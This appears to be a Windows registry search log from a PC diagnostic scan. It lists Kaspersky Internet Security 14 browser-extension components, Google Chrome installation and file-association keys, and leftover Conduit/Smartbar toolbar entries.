[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C91DB1BC1DCC316518C5635BDD9370EE]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko22\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CCD15FD6D85EF3E5E886C01BDACBA4CC]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko16\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CEB1BC7CAF87C745DBA857BA8F2A8FCB]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\virtkbd.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0FBC4C197D095A559BD060F78FD6D7D]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko15\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D4BF01793B91A6853A22A6BD8DC8186D]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\skin\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D546818284993BB5A82E68508A514EC7]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko22\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DCB5926A12248B350B5AD04F86433E6C]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko16\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DE7DDF4EB338EE652B599AAD2DAE09CA]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\locales\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E4345BDA53029405F816037863A940BB]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko22\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5508C0CB00D4CA5BB1774C698ACC1E5]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko20\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E57B76EAE22D4265F9E02B879CF79677]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko21\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E6711D0023626335084EEF3E7B16E478]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ED9B2AB1BFC423851944F5790219EAE8]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko23\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F44FF92BC273392528022F0518D5F091]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F8079306DF7DA7856AF7D7ABA6FAB8BF]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko16\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F90BC4B2AB27D7F5CA1A9E8B64F24EB3]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko24\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FC0F79EBF29921A59A83339F3D7D9CD1]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko24\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FE3B23949E730E556AAC9D2D9CDCEBCC]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\content\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FF4376E4E2C926E5CA78FFAF37F19DB6]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\locales\en\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FF785E2258A375A5BB3982D10DBBE4E8]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko19\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\blbkdnmdcafmfhinpmnlhhddbepgkeaa]
"path"="https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dchlnpcodkpfdpacogkljefecpegganj]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvisor.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\hakdifolhalapjijoafobooafbilfakh]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\hghkgaeecgjhjkannahfamoehjmkjail]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\content_blocker_chrome.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\jagncdcchgajhfhijbbhecadmaiegcmh]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\virtkbd.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\pjldcfjmnllhmgjclecdnfampinooman]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\ab.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\No Chrome Offer Until]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap"="-dev-multi-chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap"="2.0-dev-multi-chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP14.0.0\Installer\features\OnlineBankingFeature]
"Selfregs"="online_banking_firefox_registrar.dll online_banking_chrome_registrar.dll online_banking_bho.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP14.0.0\Installer\selfregs]
"abcrxreg.dll"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\abcrxreg.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP14.0.0\Installer\selfregs]
"online_banking_chrome_registrar.dll"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome_registrar.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Shared\HTML]
"KnownIDs"="htmlfile;ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML\DefaultIcon]
@="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome]
@="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationName"="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationIcon"="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationDescription"="Google Chrome is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Google Chrome."
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".xhtml"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".xht"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".shtml"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".html"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".htm"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".webp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\Startmenu]
"StartMenuInternet"="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"webcal"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"urn"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"tel"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"smsto"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"sms"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"nntp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"news"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"mms"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"mailto"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"irc"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"https"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"http"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"ftp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\DefaultIcon]
@="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ShowIconsCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --show-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"HideIconsCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --hide-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ReinstallCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --make-default-browser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\shell\open\command]
@=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe""
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\AppDataLow\Software\Conduit\ChromeExtData]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\AppDataLow\Software\Smartbar\CR\ChromeExtData]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\AppDataLow\Software\Smartbar\CR\ChromeExtData\mgekkbflbjgdcmbphhpaikbmjbifkaib\Repository]
"CT2127389.uninstallCommand"="C:\Users\Bonnie\AppData\Local\Conduit\Chrome\CT2127389\UninstallerUI.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Conduit\ChromeExtData]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Conduit\ChromeExtData\mgekkbflbjgdcmbphhpaikbmjbifkaib\Repository]
"CT2127389.hostSupportChrome29Installer"="true"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\FLEXnet\Connect\db\Google Chrome.ini]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Google\Chrome]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE51F05C5F000CE9D0]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE51F05C5F000CE9D0]
"Name"="CHROME.EXE"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE5224D150000CA7D0]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE5224D150000CA7D0]
"Name"="CHROME.EXE"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE524CDEDB000CE3D0]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE524CDEDB000CE3D0]
"Name"="CHROME.EXE"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\MostRecentApplication]
"Name"="CHROME.EXE"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\MostRecentApplication]
"Id"="CHROME.EXE524CDEDB000CE3D0"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\IEDevTools\Options\UAString]
"Chrome"="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithList]
"b"="chrome.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithList]
"b"="chrome.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList]
"a"="chrome.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\OpenWithList]
"c"="chrome.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList]
"b"="chrome.exe"

-= EOF =-

 
